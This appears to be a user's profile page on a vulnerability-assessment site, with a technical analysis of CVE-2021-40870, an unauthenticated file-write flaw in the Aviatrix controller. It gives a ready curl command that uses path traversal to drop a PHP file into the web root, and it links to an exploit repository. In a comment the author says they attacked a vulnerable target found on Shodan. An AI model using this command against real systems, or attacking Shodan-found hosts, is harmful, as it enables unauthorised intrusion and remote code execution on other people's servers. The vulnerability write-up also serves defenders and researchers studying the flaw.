JoyGhoshs (2)

Last Login: October 09, 2021
Assessments
1
Score
2

JoyGhoshs's Contributions (2)

Sort by:
Filter by:
1

hey @ccondon-r7 , Yes i have performed active attack against a vulnerable target which i found on shodan by doing little search .

1
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Very High
Technical Analysis

Description

This Vulnerability allows an attacker to create and store file on the Aviatrix controller. Exploitation phase doesn’t need any user authentication , or doesn’t require any other users interaction , simply can be exploited using curl . Here is one example.

curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'

# after executing the previous command if the target is vulnerable this will create a php file on this path

https://vulnerable.target.com/v1/poc 

Attacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem .

Or You can Use This Exploit to do the exploition more easily : https://github.com/JoyGhoshs/CVE-2021-40870

Exploitation